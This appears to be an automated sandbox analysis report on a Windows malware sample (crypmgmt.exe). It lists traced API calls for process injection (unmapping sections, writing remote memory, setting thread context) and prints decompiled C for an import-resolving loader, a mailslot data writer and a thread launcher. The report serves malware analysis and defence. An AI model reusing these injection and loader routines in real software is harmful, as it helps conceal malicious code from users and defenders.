Function 002E4B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file

Similarity

Total matches: 320
API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
String ID:
API String ID: 3756146440-0
Opcode ID: 13a3fbb8c54243ae1405e1c57313f2c46c53332a02a93cc9283264dcae27056a
Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
Opcode Fuzzy Hash: 49D0224D1F030BD4C82394A2E0C2F10C6823F32100D3C022402082836B8F3631EFDE6D
Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0

APIs

CreateFileW.KERNEL32(002E7494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 002E4B26
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B33
WriteFile.KERNEL32(00000000,?,00001000,002E7494,00000000), ref: 002E4B49
SetEndOfFile.KERNEL32(00000000,?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B54
GetLastError.KERNEL32(?,002E2C59,00000000,002E7494,?,00001FD1,00000000,00000000,?,?,002E18C5,?,?), ref: 002E4B5C
CloseHandle.KERNEL32(00000000), ref: 002E4B65

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E4A60, Relevance: 7.6, APIs: 5, Instructions: 72 Total matches: 377file

Similarity

Total matches: 377
API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
String ID:
API String ID: 1827773359-0
Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
CloseHandle.KERNEL32(000000FF), ref: 002E4AF0

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E2175, Relevance: 6.1, APIs: 4, Instructions: 107 Total matches: 388threadsynchronizationinjection

Similarity

Total matches: 388
API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
String ID:
API String ID: 4069891769-0
Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e

APIs

memset.NTDLL ref: 002E21A3

Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036

ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
SuspendThread.KERNEL32(?), ref: 002E224E

Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E372A, Relevance: 5.1, APIs: 4, Instructions: 110 Total matches: 409

Similarity

Total matches: 409
API ID: GetLastError$memcpymemset
String ID:
API String ID: 1724464136-0
Opcode ID: 752983b3e7944d967bfc605664b24e9bd319d7a804b265e52fc9e08d56eeb1c9
Instruction ID: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215
Opcode Fuzzy Hash: C60170421A6E65C8F471D947689AB3BF487FF967F6D09F70020C23028E4E8061D71F89
Instruction Fuzzy Hash: ba4a7f234d9ebbe4fc635900303f1b764cd23262994ffbb79c20cb6415721215

APIs

memset.NTDLL ref: 002E3750
memcpy.NTDLL ref: 002E3778

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

GetLastError.KERNEL32(00000010,00000218,002E4F6D,00000100,?,00000318,00000008), ref: 002E378F

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,002E4F6D,00000100), ref: 002E3872

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Process Name: crypmgmt.exe Analysis ID: 67591

General

Root Process Name:	Zx7i3Q9U9i.exe
Process MD5:	479B945127CC75C2A44ED1B13482FB07
Total matches:	36
Initial Analysis Report:	Open
Initial sample Analysis ID:	67591
Initial sample SHA 256:	CA5C9DCD28B358A05CF0F3CDA193EB48861E9B0A51E8656C23BE5CAEDF1D2012
Initial sample name:	yyy.exe

Similar Executed Functions

Function 002E3122, Relevance: 10.6, APIs: 7, Instructions: 81 Total matches: 84native

Similarity

Total matches: 84
API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
String ID:
API String ID: 1776017925-0
Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc

APIs

NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198

Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168

NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2

Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D

NtClose.NTDLL(00000000), ref: 002E31D4
NtClose.NTDLL(002E618C), ref: 002E31DD

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3880, Relevance: 7.6, APIs: 5, Instructions: 93 Total matches: 233nativethread

Similarity

Total matches: 233
API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
String ID:
API String ID: 405287775-0
Opcode ID: 16422fa5cbcf997cf8d8ddf4094cfe996cac4ccb4206dd4e90c3df64a56a7186
Instruction ID: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959
Opcode Fuzzy Hash: FEF00C400F9BA0EBF812B6821491F547683BB02F32E0EF32051F200B863F02200E8B1A
Instruction Fuzzy Hash: 4ee8f91e38277187f96cecbc10f2c4ddb51f95b78ca4709a1d369a7576d9c959

APIs

memset.NTDLL ref: 002E38A2
GetLastError.KERNEL32(?,00000318,00000008), ref: 002E3995

Part of subcall function 002E3E68: NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
Part of subcall function 002E3E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
Part of subcall function 002E3E68: SetLastError.KERNEL32(00000000), ref: 002E3EA7

Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD

memcpy.NTDLL(00000218,002E4F92,00000100,?,00010003,?,?,00000318,00000008), ref: 002E391D

Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
Part of subcall function 002E3E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
Part of subcall function 002E3E27: SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 002E3974
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3977

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E278F, Relevance: 6.1, APIs: 4, Instructions: 79 Total matches: 297native

Similarity

Total matches: 297
API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
String ID:
API String ID: 2756933261-0
Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
memset.NTDLL ref: 002E280F
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
NtClose.NTDLL(?), ref: 002E283F

Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E68, Relevance: 4.5, APIs: 3, Instructions: 29 Total matches: 229memorynative

Similarity

Total matches: 229
API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3367774474-0
Opcode ID: 41e13fcf86dc4b3d751067dcd296ed22fbfc5f147028583741b35f2a38466cce
Instruction ID: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd
Opcode Fuzzy Hash: B0C012801C1D82EAD57B9488419DB2A119677A1101C1D733211809D5407FA0305B0F1D
Instruction Fuzzy Hash: 9d0754b4a53c7716e52a0dbaf66079789dacaff85707c89c3e4538a0fd9930dd

APIs

NtAllocateVirtualMemory.NTDLL(002E38CA,00000000,00000000,002E38CA,00003000,00000040), ref: 002E3E99
RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3EA0
SetLastError.KERNEL32(00000000), ref: 002E3EA7

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3E27, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 236native

Similarity

Total matches: 236
API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 1449157707-0
Opcode ID: 2ed1afa1f8d583104eaac44049c4c607334b4aa5ab8e72b653f2dcbc79efa973
Instruction ID: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa
Opcode Fuzzy Hash: 95C0928B1505C74DDB3AA98181EEF4DC2C57FB177342C31094088C972E598A326B4E49
Instruction Fuzzy Hash: 8cccbe2df0253c9c18979b1fa8fd50b07792896aeb97b9ed1177a34a95bdebaa

APIs

NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E54
SetLastError.KERNEL32(00000000,?,002E1A67,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000), ref: 002E3E5B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E3DE6, Relevance: 4.5, APIs: 3, Instructions: 26 Total matches: 238native

Similarity

Total matches: 238
API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
String ID:
API String ID: 3946382534-0
Opcode ID: aed4696055f3d46c6fa4a2efaa20ff5ea458cda21972fc3345feb9d6d727ddb0
Instruction ID: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536
Opcode Fuzzy Hash: 09C092CB1415C74DDB3AA99281EAF4DC2C57EB177342C31094088C971E598A366B4E49
Instruction Fuzzy Hash: a9cdfd71e4bef7ffe137eafdadfb13b9e2c13e58845fd9648d6a85622cd56536

APIs

NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401639, Relevance: 16.6, APIs: 11, Instructions: 85 Total matches: 95
threadsynchronization

Similarity

Total matches: 95
API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread
String ID:
API String ID: 2699342322-0
Opcode ID: cbe0259121293ce785fa7e3a9f1ca2c81b7074ba88f55b4f5292b4e6af892abb
Instruction ID: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82
Opcode Fuzzy Hash: AFF089CB049AC2E5412D34407422FE79092DF92683D1CA6612EDE3664B1F51711BFA1E
Instruction Fuzzy Hash: 1d74001b5ab88d5255f826caea7b503200f655b60dcbaad390ff8a1721d06b82

C-Code - Quality: 100%

			E00401639(intOrPtr __eax, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				void _v28;
				void* __ebx;
				void* _t29;
				void* _t34;
				long _t45;
				void* _t47;
				void* _t51;

				 *0x40305c = __eax;
				_v28 = _a4;
				 *0x4030e8 = 0x736c6e70; // executed
				_t29 = CreateThread(0, 0, E00401034,  &_v28, 0,  &_v12); // executed
				_v8 = _t29;
				if(_t29 == 0) {
					_a4 = GetLastError();
				} else {
					_t34 = CreateThread(0, 0, E004010FB,  &_v28, 0,  &_v12); // executed
					_t47 = _t34;
					_v16 = _t47;
					if(_t47 == 0) {
						_a4 = GetLastError();
					} else {
						_a4 = 0;
						WaitForSingleObject(_t47, 0xffffffff); // executed
						if(GetExitCodeThread(_t47,  &_a4) == 0 || _a4 != 0) {
							TerminateThread(_v8, _a4);
						} else {
							WaitForSingleObject(_v8, 0xffffffff);
							if(GetExitCodeThread(_v8,  &_a4) != 0 && _a4 == 0) {
								_t45 = E00401593( &_v28, _t51); // executed
								_a4 = _t45;
							}
						}
						CloseHandle(_v16);
					}
					CloseHandle(_v8);
				}
				return _a4;
			}

APIs

CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9

Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9

TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
CloseHandle.KERNEL32(?), ref: 004016F0
GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
CloseHandle.KERNEL32(?), ref: 00401704
GetLastError.KERNEL32(?,00000000), ref: 0040170D

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 004010FB, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 90 Total matches: 95
sleepfile

Similarity

Total matches: 95
API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
String ID: \\.\mailslot\msl0
API String ID: 1001206095-622273203
Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981

C-Code - Quality: 94%

			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs

CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
GetLastError.KERNEL32 ref: 00401126
Sleep.KERNEL32(00000064), ref: 00401131

Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
memset.NTDLL ref: 004011C8

Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213

CloseHandle.KERNEL32(?), ref: 004011E4

Strings

\\.\mailslot\msl0, xrefs: 00401113

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E1224, Relevance: 13.6, APIs: 9, Instructions: 77 Total matches: 182registrymemorystring

Similarity

Total matches: 182
API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
String ID:
API String ID: 1756712956-0
Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b

APIs

PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
StrStrIW.SHLWAPI(00000000), ref: 002E12E4
HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 00401389, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89 Total matches: 143
librarystringloader

Similarity

Total matches: 143
API ID: lstrlenmemset$GetProcAddressLoadLibrary
String ID: ~
API String ID: 3655391705-1707062198
Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11

C-Code - Quality: 100%

			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs

LoadLibraryA.KERNEL32(?), ref: 004013B6
lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
memset.NTDLL ref: 004013D3
GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
memset.NTDLL ref: 0040143B

Strings

~, xrefs: 00401471

Memory Dump Source

Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
Associated: 00000001.00000002.556350474.00404000.00000008.sdmp

Function 002E14CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread

Similarity

Total matches: 29
API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
String ID: USER32.DLL$pnls$pnls
API String ID: 1514306980-1300720345
Opcode ID: 2c5a9dded362ff6b46e0f4448b1e9a0fe29640a45ef5089f97095037391d754a
Instruction ID: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25
Opcode Fuzzy Hash: 95D023C40D5D4604447A48CDE4997BE01C7BC2073105A1D78501D404D34F57729F2F8D
Instruction Fuzzy Hash: 1c8a57dc03bd1ce046409f9638705802bfa1b9c8ef3fb2fc6285161cb0e1dd25

APIs

LoadLibraryA.KERNEL32(USER32.DLL), ref: 002E14D9
GetModuleHandleA.KERNEL32(USER32.DLL,002E8000,?,?,002E180F,00000000,?,002E7494), ref: 002E14FF
FindWindowA.USER32(002E8640,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1515
GetWindowThreadProcessId.USER32(00000000,00000000,?,?,002E180F,00000000,?,002E7494), ref: 002E1520

Strings

USER32.DLL, xrefs: 002E14D3, 002E14D8, 002E14FE
pnls, xrefs: 002E1526
pnls, xrefs: 002E151B

Memory Dump Source

Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Function 002E1093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread

Similarity

Total matches: 199
API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
String ID:
API String ID: 2400451634-0
Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775

APIs

InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5

Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038

CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
